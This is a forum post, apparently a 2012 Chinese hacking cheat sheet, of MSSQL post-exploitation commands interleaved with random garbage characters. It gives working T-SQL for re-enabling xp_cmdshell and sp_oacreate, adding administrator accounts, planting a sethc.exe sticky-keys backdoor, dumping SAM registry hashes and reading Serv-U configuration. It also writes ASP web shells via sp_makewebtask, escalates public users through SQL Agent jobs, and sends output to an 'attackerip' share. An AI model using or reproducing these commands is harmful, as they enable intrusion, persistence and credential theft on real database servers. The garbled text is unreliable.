1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号
( c- |: ~1 e3 _: P K8 ?/ P8 n恢复方法:查询分离器连接后,
! J4 L1 `/ O' B% Q8 Z: [, V/ I, m第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
% D3 l3 p3 @7 g第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
8 H( F" ]; S4 j6 |然后按F5键命令执行完毕
8 Z' J4 |, p7 ]- z' b) M- J; l3 q# `7 o6 B, v, p d8 n
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)) }, M5 T" J6 s$ r# a+ D7 M3 Y
恢复方法:查询分离器连接后,
3 f, Q$ Z+ u3 _& N第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"
/ U5 b) k* W# o2 b8 D% z: Y/ L) C( |- I X第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
& J5 L( e' G- @" }然后按F5键命令执行完毕 z* ?* T, }4 z0 i, ^
4 {& z( f6 o. a E) K
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
, e' W2 `- m$ Y% ]: S恢复方法:查询分离器连接后,
/ P1 L6 s V* T0 F第一步执行:exec sp_dropextendedproc 'xp_cmdshell'/ Z( U, k7 W7 {
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' - |: t7 p+ U! j$ I2 @
然后按F5键命令执行完毕
6 e9 G% i ]7 q. |) | X/ j1 _9 `, s. `. ~
4 终极方法.5 ~# h- [7 {7 r5 a
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户: `* P0 X; }* f0 p3 }
查询分离器连接后,
, ?" ~3 I+ H W! t2000servser系统:3 o% L1 r' U+ w5 e8 x
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
: V+ T: G( R, y6 C
! o, F7 q; v% R) gdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'5 e4 h% |# t: q m4 K
6 [, }' A" [+ K4 q" l8 o- i7 z8 sxp或2003server系统:7 S9 n6 p4 \7 i. z% s
+ ^8 n+ k: b5 [
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'4 z& X3 V' i( P U V
$ Z. Z6 a+ Q* F1 y4 X8 P
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
# b/ s2 ~$ _: N" ?8 M p8 w4 H1 F# d5 n! U3 c4 p
( Z2 L( Q. ~& ~5 i' y1 y" v; C
五个SHIFT8 }3 q7 t5 c p/ B
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
0 m" L- V" i: h. T% d9 g/ L
7 N, N/ _" @+ L2 }declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; ) S; ?% C6 |8 \. v3 B2 {) I
) I2 Q. e1 U# h" N. e; I N, b( Nxp_cmdshell执行命令另一种方法
4 w1 I" _( l0 o& Y7 Xdeclare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'
) S2 G9 _8 q! {2 `$ R. B
7 F0 n/ j* A; ?( C5 r判断存储扩展是否存在
2 F7 V# [$ B# P, u/ G) ]7 `6 zSelect count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'1 b7 E+ o! m2 `5 U
返回结果为1就OK
% z; K8 I) v( A) a& R2 Z4 G) F7 n/ ~8 Z9 |8 k$ o& k
; W( t; g* J4 U; o" v2 s! @
上传xplog70.dll恢复xp_cmdshell语句:
* H* C( N" j4 j' m osp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL': a1 [2 j: O: |; m* q
* J$ n) t2 c, J7 [% h否则上传xplog7.0.dll
1 W. j, W& \1 C2 q: w& Q" M" ^Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'8 o- I! n- {; O+ y: G
0 v8 e) A8 p* I1 u6 w1 e! Q3 w- N+ l
# A! X0 i8 V \5 |( L l8 {% r8 d. \5 ~
首先开启沙盘模式:
5 f& Y I/ [. c) z4 ]7 Uexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',11 i8 c3 N# J2 G$ }
2 D/ }1 i+ w$ D然后利用jet.oledb执行系统命令
( R. q2 J# K0 |5 Y/ Pselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')/ g% }0 H" y9 D& G
返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了
& w' T$ d! v7 ]" H" h4 ?" }- B9 W) z ~7 [
5 R7 M- U2 d* n( r
( [; P9 l/ @5 C& e1 p1 n, ?恢复过程sp_addextendedproc 如下: ' G; F+ k& d9 k" g
create procedure sp_addextendedproc --- 1996/08/30 20:13 - h7 r8 R1 g: l/ l }, R- O
@functname nvarchar(517),/* (owner.)name of function to call */ 9 w6 G+ J. }) f, z" b
@dllname varchar(255)/* name of DLL containing function */
. M- K! i0 q, `) r( kas
4 ?" U* X! M9 v1 n' Kset implicit_transactions off
' v7 t/ J! v) R% zif @@trancount > 0
! k" f6 M! @* r; I* R% Fbegin
: m: ~/ i- [- J5 H1 X- G+ @( {( Qraiserror(15002,-1,-1,'sp_addextendedproc') ) o2 S4 P% `* h7 Z
return (1) : T. h* E, o1 ^0 ~+ _* O3 _
end / H7 ^% P7 k4 Q L5 r2 F: q0 T
dbcc addextendedproc( @functname, @dllname)
+ L% _8 [7 J, V9 p, lreturn (0) -- sp_addextendedproc
" C0 Y* q& V, W( Y9 a, nGO * k* }( s8 F6 y
& W9 ?! _) C9 R
9 j0 n; t0 x! g9 l r' K! ?9 m: O$ Q7 W
导出管理员密码文件
. l. C; v2 @/ W- z# C; R2 p; osa默认可以读sam键.应该。$ g. T% m _- Z/ f2 G* P
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg8 ~% m g+ @2 r4 S6 b
net user administrator test
t% J' ^; E& \& |1 f用administrator登陆.
: P9 k& g# Y c7 r% @用完机器后
0 p* L U" j% p7 V4 N" U( Areg import c:\test.reg
* n& D( |7 b+ g+ g- Z$ o- U根本不用克隆.
7 T% k, w. G- ~- ~找到对应的sid. 8 g& y/ Z7 @) m1 i# t
9 q N- c- e) ^) @1 {% \/ A
# x( I, J& P; d; P% n0 T7 h+ u& B8 u$ k6 C, h
恢复所有存储过程
/ L" F, V/ a. m3 L S+ ^- Ruse master 4 e3 x% r% }# }! L' r
exec sp_addextendedproc xp_enumgroups,'xplog70.dll' 2 O$ y+ O$ v+ ]6 \$ m2 h5 B6 \
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' $ P# W: i% p: b: d, h9 m
exec sp_addextendedproc xp_loginconfig,'xplog70.dll' ' _8 A9 N% F9 t2 |6 r
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' " B! Q- W& D/ @
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
( o7 _, A/ s7 ~exec sp_addextendedproc sp_OACreate,'odsole70.dll'
) j" U% e# c) Dexec sp_addextendedproc sp_OADestroy,'odsole70.dll' ! A2 o5 R% a1 _' q/ P, `3 a
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
- y) r* K" m3 U" Hexec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
! [! T$ ? g* {exec sp_addextendedproc sp_OAMethod,'odsole70.dll' % Z, I& G. ]! k5 x
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll' , l: h. Z, {7 L' Q
exec sp_addextendedproc sp_OAStop,'odsole70.dll' # g0 z3 ?( J J: K/ G
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' , {2 m* l/ z9 O# ]9 a2 K: ^
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
0 D7 A/ S& f6 r v* B8 z6 h7 r) _0 gexec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
5 }- s8 l E3 eexec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
4 F# n4 @/ e; _8 t; E1 O3 j9 Texec sp_addextendedproc xp_regread,'xpstar.dll'
- T9 D4 Z# M8 Qexec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' 5 t& g- R, m, I3 g4 V. ^
exec sp_addextendedproc xp_regwrite,'xpstar.dll' % k/ ` _: T0 P* O9 Y# t# ^# t
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'. H! A, s+ x" Z! h7 }# f. \' k4 y
) G3 l, {1 M# s
3 ]- A) A- J6 i' k- [
建立读文件的存储过程
( Q) V5 ]6 N9 U! _, X% {( `$ O! D pCreate proc sp_readTextFile @filename sysname. R$ r8 f6 E+ \6 d) Z- U% D/ W
as' C) b' t/ Q0 O" y9 a
$ Y9 U# ^, Y1 U- r( P; q" L, I) R" w9 @ begin : Q0 ~5 H. a8 ?
set nocount on
- u0 i9 ]' \0 w b8 e Create table #tempfile (line varchar(8000))6 E, j4 ]6 `9 f5 P
exec ('bulk insert #tempfile from "' + @filename + '"')
# t) M( F# R$ x6 U6 Y, L select * from #tempfile
- b' H f+ }/ ^3 E& ]- {& ? drop table #tempfile b+ [5 U. Z/ j0 u
End, A/ F5 {0 v) h5 r
% I& [; @% R2 {5 }: { |
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件. K. g0 p! P/ ~* B5 Z1 j# F3 I
查看登录用户
* `+ _1 V5 Z+ V0 ^( X: W, p1 ESelect * from sysxlogins% G1 X, m X; u% ~; ]
& V1 X% {7 V$ F9 P把文件内容读取到表中
* J3 ~# ^- z$ Y, z. fBULK INSERT tmp from "c:\test.txt"- s5 j1 {# }: A6 K; G: \# k @8 v
dElete from 表名 清理表里的内容 p6 \3 ?4 K% t, `
create table b_test(fn nvarchar(4000));建一个表,字段为fn/ I8 B$ X8 { |
1 Y2 O& Y8 T8 }5 t" d2 h" y L* J4 D$ i
加sa用户7 E" @& ^& P( u7 y! g
exec master.dbo.sp_addlogin user,pass;$ k3 a: |2 {* X
exec master.dbo.sp_addsrvrolemember user,sysadmin
, p, |, ^3 `. {2 P! W d6 q( {
) C2 c( C" L- C7 c$ p0 D2 t9 v0 O5 b# e
3 r0 r" z* ^% g& a( Y: n
读文件代码4 `% k2 `6 t5 Q
declare @o int, @f int, @t int, @ret int4 W4 ]; C; P- n, x
declare @line varchar(8000)4 A8 b' f. `1 A" ^# Y( g$ c; V, `
exec sp_oacreate 'scripting.filesystemobject', @o out
: Q# [5 v% M; B( E3 U6 y! P. Yexec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1: D3 V# L3 h, W5 c* u
exec @ret = sp_oamethod @f, 'readline', @line out
$ V& b3 z6 g) V/ wwhile( @ret = 0 )0 M' E. q4 N7 ^! j4 v
begin6 D0 N- i h. r! {- V$ Z( ?
print @line
3 p# l8 G3 u3 [- X0 f2 ]exec @ret = sp_oamethod @f, 'readline', @line out$ z( b) Y' [3 R- d- X: ?/ G. {
end
- p' x, ?: y3 p& `2 Q; c$ q* S+ F$ G3 U; N Z$ `8 B, G8 w/ F
( Z4 ~, ^% Q! E) `
写文件代码: }) O _% y& b; \
declare @o int, @f int, @t int, @ret int
% P% _" Y: l9 |2 Gexec sp_oacreate 'scripting.filesystemobject', @o out) q! ^0 ~* q2 S. |. b& z* r! J
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 16 P9 d% B2 h g8 R$ K
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》5 \7 M# e: O( O* {& R5 k
& M( v% y3 e, U& R
9 P M3 J$ b i/ N& H! Q& h# k
添加lake2 shell
4 B7 }4 I! j$ Q0 i R8 r7 ^sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll') E0 Q6 a$ U: H+ E0 d
sp_dropextendedproc xp_lake2
9 y( m$ ]) `6 f# j/ E5 Z* q+ rEXEC xp_lake2 'net user'3 j% [7 ^' S0 T h T
6 d4 W& {5 Q4 j& R/ ?% g- {. n& f1 r0 _: I
得到硬盘文件信息 ( y* x7 }8 U5 k$ i1 h& f
--参数说明:目录名,目录深度,是否显示文件
1 [# J& P. @; n P9 r" J$ \0 jexecute master..xp_dirtree 'c:'
* q7 I P" p2 g7 B+ vexecute master..xp_dirtree 'c:',1
: L( W2 b( C! Z; B3 f& Wexecute master..xp_dirtree 'c:',1,1
% h% A. p+ ]+ v3 s3 D+ B7 _0 v* F: L* w o/ o, M+ ]: l. b0 L' ]
6 f9 [5 W. N q" w% z读serv-u配置信息
6 h) n3 t- P0 }; \exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'+ I: \# u6 U$ v, U4 z1 V1 o
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'
' h. R3 O. S; K6 @7 I9 k5 Z/ `( A' w5 m4 \, a4 v
通过xp_regwrite写SHIFT后门
) r9 m. X) t! g. a* dexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--
& m* f7 i- s% N) u$ P
0 d# |; A; Z4 l7 }9 g
( E; l8 z' u% \: G2 c
& G; a) z) A& C找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';
; {( |6 p/ a4 L' u4 [exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了
) x9 h3 V4 Q) y6 q# t5 N% n3 u9 j L3 }
EXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
9 I7 K$ n: I8 `! ~ O; k/ J6 W9 P6 W$ N6 m2 J% g
5 i6 z, e& l9 Y) A, U3 ~7 [. N2 l3 W, Y& _6 h* L
sql server 2005下开启xp_cmdshell的办法2 V" x! `- Y8 X3 Q6 S1 {, ?
: ]6 B( Y3 a0 R! l0 \! B* I
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
% M; D6 C8 U3 P/ ^4 v$ @# p( }) n* V9 I6 m( Q& c
SQL2005开启'OPENROWSET'支持的方法:2 e& B: d) e+ Q' o* I2 [
) U7 M( [ `, i/ g/ Y# Qexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
4 ^) _$ K9 ]& V; ~! I Y$ [- _* C F+ X9 X3 F$ ?# A
SQL2005开启'sp_oacreate'支持的方法:
6 H1 B, k" @* o# v. M6 H# j9 s8 b. p3 I# z# `! S% p
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
- Z: z8 k$ w2 j F: p% K1 z
" p" m8 Y. y, ^8 c' X. K. x6 L P5 N* W. x1 o+ }3 ~% x
7 Y, F6 \3 Y: V% i& D
5 v1 M6 ?% F! v. H0 U' P
( V4 Q8 H6 S& E3 ^( Q; B9 i, F+ F3 t! t4 A- u H! x
; F# A7 C1 o" r& f9 i! z3 n: {9 Y+ z2 b3 f; n- u
3 e c' U! r' D& X9 q
+ }/ E3 r; m0 t
8 V8 a# ?3 c2 t- p3 a/ Y8 R/ W& F: n/ H
1 B- ~2 a/ Z3 L. l2 x1 O" R! A1 c
) T5 r! P( U& j+ H0 b* [5 B, o8 x' |) w9 t8 [" |
/ o8 N$ g3 c' m( y
' `: e& _. |1 Y; ~( {( D1 v0 N9 p1 v+ L5 Q! K
6 g) X; G! _& H7 ?' W# X
8 ^: n/ x# a2 d, T+ B8 H: o
- n+ J" D- D. c5 ^
+ {8 i- ?2 J- _
1 K; G& `( r7 c2 a& P% S- d# y以下方面不知道能不能成功暂且留下研究哈:
( h1 g. k6 A2 A9 X4)
/ y. r; q% e3 r' @use msdb; --这儿不要是master哟
6 V0 p0 C! i% N+ |+ xexec sp_add_job @job_name= czy82 ;) m3 f8 W8 F3 I, g- f) @
exec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;
+ g' }! \, D: U& d4 Hexec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;% F; H' r* M& F+ B7 z$ V
exec sp_start_job @job_name= czy82 ;
) N) C# f1 j& g) {# n
1 S& V, m4 h- S+ e利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以
7 H1 a) K+ `+ m执行tsql语句了.' c. x W( Y% Z! {9 I
对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名" w0 ?# Z, i/ Q
第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)+ ]5 n; Q& ?. i p% _6 W
net start SQLSERVERAGENT
% R L- g; u, E
# U% D; }+ M; {. `# D对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的' r7 o0 F( i& ~
USE msdb/ n0 [6 R+ K) d9 `) V7 n, S
EXEC sp_add_job @job_name = GetSystemOnSQL ,4 K5 |1 v& u% @9 I1 x0 B" e5 w7 Q
@enabled = 1,1 V' O; L O$ P- o p2 F0 ]
@description = This will give a low privileged user access to' c6 e- ^8 `3 h4 k, c
xp_cmdshell ,+ E% a& s7 Q$ W Q+ N
@delete_level = 1
" }$ j6 D1 O% c" i! ~7 EEXEC sp_add_jobstep @job_name = GetSystemOnSQL ,% U& X& T. s1 k1 N
@step_name = Exec my sql ,
, ~5 R. c- [0 ~# p3 B! J# N@subsystem = TSQL ," J& M$ U4 C9 q' G
@command = exec master..xp_execresultset N select exec2 ?* R4 P3 z1 w x
master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master 2 b* v- L( z |" `) ^9 s4 f' U$ U
EXEC sp_add_jobserver @job_name = GetSystemOnSQL , x% j4 f1 F2 A" o% a
@server_name = 你的SQL的服务器名
- {, X" D/ H3 d; \, m. KEXEC sp_start_job @job_name = GetSystemOnSQL 9 o: z8 ~+ f& y
5 U: Y; k; A( T0 G' o; z( I
不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以! Z/ W0 [- e& L4 J" _
才让我们可以以public执行xp_cmdshell5 F1 s, F3 |: c
* p5 @: ~" M {6 S7 ?# c
5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
! l6 O! I. o( s: }在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968
5 Z( k' t. l, x7 M( `
, I/ K9 h+ f& \. z0 u7 S( b3 aUSE msdb5 {1 K. ?: A" G7 v. W
EXEC sp_add_job @job_name = ArbitraryFilecreate ,5 R! \6 f2 N, h1 i4 k2 r4 @% O1 m
@enabled = 1,: E7 g. m2 R$ z: d$ ^
@description = This will create a file called c:\sqlafc123.txt ,
. ~$ f! W, ?' x8 _- L@delete_level = 1
3 D! Z: k5 q/ S2 I0 ^' r) p& ?2 |( W! KEXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
3 l* ` D8 \2 C4 e* u0 ~, N@step_name = SQLAFC ,3 ]; \2 j, _( |) N
@subsystem = TSQL ,
$ @% c8 @5 L2 ?3 M@command = select hello, this file was created by the SQL Agent. ,
8 N$ _$ X! U, h. N& m% }@output_file_name = c:\sqlafc123.txt
# G' G* N2 { FEXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,
" D& o- `( c( `" l8 |@server_name = SERVER_NAME
) X! b: k5 A$ g8 }- c7 n xEXEC sp_start_job @job_name = ArbitraryFilecreate # |8 B( i8 w5 }8 i" F
4 S5 g+ p' N9 h4 z如果subsystem选的是:tsql,在生成的文件的头部有如下内容
9 }! U0 \" S5 W
! _6 }- M# S- S v, Q' }??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:192 i( b3 b" O/ b3 R4 X4 K
----------------------------------------------
2 g0 Q; x6 U6 i, ehello, this file was created by the SQL Agent.
5 T/ R- C9 b) F0 {' D" q3 T8 t% g4 f" w
(1 ?????)$ o3 ?* L, |$ | k
# E: Q, _2 q# Q# g4 K
所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员
) @# q; k- S2 ]命令的vbs文件到启动目录!& e: w9 y [) n$ M ^" S6 z# Q
( \9 e; X [5 p6 g& x! ]. z6)关于sp_makewebtask(可以写任意内容任意文件名的文件)* E% T0 r. z& J( J- S6 n0 f
关于sp_MScopyscriptfile 看下面的例子
: K/ O3 z3 x: k. M' k2 A/ | L- ydeclare @command varchar(100)
/ j, h: u" s3 c+ R& J' r! v; zdeclare @scripfile varchar(200)
4 W H) v0 @7 U& s7 dset concat_null_yields_null off
3 V& W( M$ @2 V+ W* \# vselect @command= dir c:\ > "\\attackerip\share\dir.txt" 8 F+ }8 {5 |$ c
select @scripfile= c:\autoexec.bat > nul" | @command | rd "
7 ]8 t* b9 x0 Q; {& uexec sp_MScopyscriptfile @scripfile , $ C# c; I | B. E3 q" B6 f3 v* g1 Z8 Y
6 B8 @3 C2 a2 x3 E! Y! y这两个东东都还在测试试哟
9 Z s: z. _1 A% p让MSSQL的public用户得到一个本机的web shell
& t8 b. c" a- d }3 z+ {$ C g$ C0 k: O) O( V/ ]
sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,7 W2 ?" A5 r8 `2 Y: Q
--@query= select <img src=vbscript:msgbox(now())>
. ]. v. ]/ g8 z- X--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
6 K, b4 c" S [6 j0 w1 k8 ?@query= select & f/ s; s( N) `2 ]( \: J
<%On Error Resume Next
|; R1 I& R/ O7 P/ X4 x1 Y3 RSet oscript = Server.createObject("wscript.SHELL") * W* ]& e* j' u# Z* m) Y; d
Set oscriptNet = Server.createObject("wscript.NETWORK") : Z5 y" i5 U- G; ]' ?/ b) m
Set oFileSys = Server.createObject("scripting.FileSystemObject")
# @% h$ c7 E7 |% w) g7 yszCMD = Request.Form(".CMD")
; S/ {9 G% a! h' u; rIf (szCMD <>"")Then
7 f* P/ Y( U* ^4 N- Z6 W4 B) DszTempFile = "C:\" & oFileSys.GetTempName()
5 _0 Z5 s. u; P9 u! |" VCall oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 7 D* |6 u8 N3 X( z
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
/ W3 Q; ~ L3 _4 cEnd If %> % Q/ o: [8 @. u6 Y, `
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST"> , D8 ?2 R8 e2 P
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
" Y/ F* a1 k; o6 q2 b</FORM><RE>
+ K' L/ y+ K& H% E<% If (IsObject(oFile))Then - C8 {6 Q! Z: E1 F6 {
On Error Resume Next
! U$ c- X: \ K' I0 dResponse.Write Server.HTMLEncode(oFile.ReadAll)
; _- ]( M" s! i' ?6 `oFile.Close
& s$ M4 J* r2 J) R; N" S8 \! }: X2 dCall oFileSys.deleteFile(szTempFile, True) # T/ C B' ~8 Q, Q
End If%> 9 D% `( S7 b, w4 U) Z
</BODY></HTML>
R1 S0 U0 S. P$ @+ b M |
发表于 2012-9-15 14:37:30
收藏
支持
反对